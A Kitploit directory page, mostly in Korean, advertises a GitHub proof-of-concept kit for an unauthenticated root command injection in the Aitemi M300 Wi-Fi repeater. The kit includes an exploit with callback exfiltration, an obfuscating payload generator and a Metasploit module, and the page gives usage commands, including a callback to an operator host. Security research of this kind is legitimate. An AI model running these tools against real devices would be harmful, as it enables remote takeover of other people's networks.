Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
도구/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

저장소 보기
21개월 전아직 검토되지 않음

CVE-2026-58457 - Shenzhen Aitemi M300 Wi-Fi 리피터에서 인증되지 않은 OS 명령 주입

[!WARNING] 이 코드는 교육 및 연구 목적으로만 있는 그대로 제공됩니다. 이 PoC를 프로덕션 시스템, 공유 환경 또는 승인되지 않은 대상에서 사용하지 마십시오.

  • 이 코드를 실행하거나 호스팅하면 오용 시 안티바이러스 탐지, 보안 모니터링 경고 또는 법적 결과를 초래할 수 있습니다.
  • 저자 및 저장소 관리자는 이 코드로 인한 손해, 오용 또는 불법 활동에 대해 책임을 지지 않습니다.
  • 격리된 실험실 환경에서 적절한 승인을 받은 후에만 사용하십시오. 방어 연구, 취약점 분석 및 블루팀 테스트 전용입니다.

취약점 요약

smacfilter_conf 핸들러에 인증되지 않은 OS 명령 주입 취약점이 존재합니다. name, enable, mac GET 매개변수는 살균되지 않은 상태로 sprintf() 호출에 전달되어 root로 실행되는 UCI 명령을 구성합니다.

  • 심각도: 위험 (CVSS 9.8)
  • 영향: 인증 없이 원격으로 root 명령 실행

포함된 도구

  • poc.py - HTTPS 지원, 재시도, 시간 초과 및 콜백 유출이 포함된 완전한 기능의 익스플로잇.
  • val.py - 안전하고 수동적인 취약점 검증기 (무해한 id 명령 사용).
  • gen.py - 여러 난독화 기술을 사용한 고급 페이로드 생성기.
  • MITIGATIONS.md - 권장 방어 조치.
  • Metasploit 모듈 - exploit/ 디렉터리에서 사용 가능.

설치

root@kitploit:~
pip install requests

빠른 사용법

  1. 검증 (안전)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. 익스플로잇 (승인된 테스트 전용)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. 난독화된 페이로드 생성
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. 모듈 이동
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# 또는 기본 MSF 경로: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. 전체 다시 로드
root@kitploit:~
msfconsole -q -x "reload_all"

참고 자료

  • CVE-2026-58457
  • VulnCheck 권고
  • GitHub 공개

Star 및 기여를 환영합니다 - 특히 우회 개선 또는 추가 펌웨어 변형.

도구 다운로드